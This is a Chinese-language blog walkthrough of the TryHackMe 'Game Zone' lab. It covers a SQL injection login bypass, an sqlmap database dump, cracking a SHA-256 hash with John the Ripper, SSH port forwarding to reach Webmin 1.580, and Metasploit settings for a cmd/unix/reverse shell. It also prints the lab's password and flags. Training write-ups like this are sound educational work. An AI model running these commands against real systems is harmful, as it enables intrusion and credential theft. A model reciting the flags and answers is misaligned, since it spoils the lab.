📌 目录

    【THM】Game Zone 游戏区

    【THM】Game Zone

    部署易受攻击的机器

    image-20250402081312126

    image-20250402083831794

    玩过杀手47的一下就懂了吧,答案:agent 47image-20250402084020913

    通过 SQLi 获取访问权限

    image-20250402084105684

    image-20250402084119449

    我们先利用万能密码试一下

    image-20250402084922208

    成功,重定向至/portal.php页面image-20250402085021139

    使用 SQLMap

    image-20250402085232692image-20250402085247339image-20250402085304376image-20250402085315027

    答题:

    image-20250402085653402

    我们想要利用sqlmap,需要找到注入点,先从最常见的url内找起,输入搜索内容后搜索发现url无变化,则代表此处没有注入点,那么接下来就需要用到burp来抓包,在数据包内查找注入点image-20250402085856163

    如图我们可以找到下面的参数“searchitem”,猜测此处为注入点,将数据包保存下来,并将“123”修改成“*”,告诉sqlmap要在此处进行扫描image-20250402090113195

    利用命令,爆破出db数据库中的users表和post表,可以得到题目所需答案

    sqlmap -r packet.txt --dbms=mysql --dump --batch
    

    image-20250402091620294

    image-20250402091739152

    使用 JohnTheRipper 破解密码

    image-20250402091838960image-20250402091858816image-20250402091905961

    让john自动判断hash类型很有可能导致无法正确破解,我们需要用hash-id.py工具来进行对哈希的判断,再利用john

    wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py
    #使用该命令下载hash-id.py文件
    

    image-20250402093029217

    可以看到有两种可能,我们先尝试“SHA-256”

    john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
    

    爆破出密码:videogamer124

    然后利用密码,ssh连接到目标

    image-20250402132853458

    flag为649ac17b1480ac13ef1e4fa579dac95c

    通过反向 SSH 隧道暴露服务

    image-20250402134211113image-20250402134227750image-20250402134241610

    进入之前ssh连接的终端,输入命令ss -tulpn便可以获取socket,tcp的一共有5个image-20250402140146235

    我们发现还有两个udp端口,状态为UNCONN,不可链接,但是我们可以通过反向ssh隧道访问这两个端口,具体操作命令如下

    ssh -L [本地IP:]本地端口:目标主机:目标端口 <username>@<ip>
    #这里我们输入 ssh -L 2345:localhost:10000 agent47@10.10.38.91
    

    建立完反向ssh隧道后,我们可以在本地机器的浏览器访问localhost:2345,访问目标机的10000端口

    image-20250402141957077

    可以看到cms为Webmin,使用agent47的账号密码进去,发现版本信息:1.580image-20250402142303440

    权限提升使用 Metasploit

    image-20250402142346890

    我们已知该cms的版本,可以去查找有无漏洞image-20250402144802623

    选择第一个,使用如下命令配置

    set RHOST localhost  //因为我们之前开了反向ssh
    set RPORT 2345  //同上,选中转发的那个端口
    set PASSWORD videogamer124
    set USERNAME agent47
    set payload cmd/unix/reverse
    set LHOST 攻击机ip
    set LPORT 你想要监听的端口
    set ssl false //注意SSL需要关闭
    run
    

    image-20250402145202833

    flag为a4b945830144bdd71908d12d902adeee

    image-20250402145238774

    posted @ 2025-04-02 14:58  羽弥YUMI  阅读(38)  评论(0)    收藏  举报